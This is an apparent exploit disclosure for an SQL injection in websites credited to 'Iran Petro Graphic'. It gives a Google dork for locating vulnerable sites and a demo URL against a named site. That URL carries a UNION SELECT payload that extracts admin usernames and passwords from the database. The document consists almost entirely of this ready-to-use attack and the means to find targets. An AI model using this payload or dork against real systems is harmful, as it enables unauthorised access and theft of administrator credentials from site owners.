##########################
# Exploit Title: Iran Petro Graphic SQL injection Vulnerability
# Google Dork : intext:"Design By : Iran Petro Graphic" inurl:php?id=
# https://www.youtube.com/channel/UCyngNTHNoRLQkWRn3bQjpJQ
# Discovered By: Mr.voltage
# Vendor Homepage : http://www.iranpetrographic.ir/
##########################
# {DEMO}
http://www.iranenergyclub.ir/subservice.php?id=-1+UNION+SELECT+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin--+
###################################
#Thanks to : Shayan 72 - T!nk3r
# Discovered By: Mr.voltage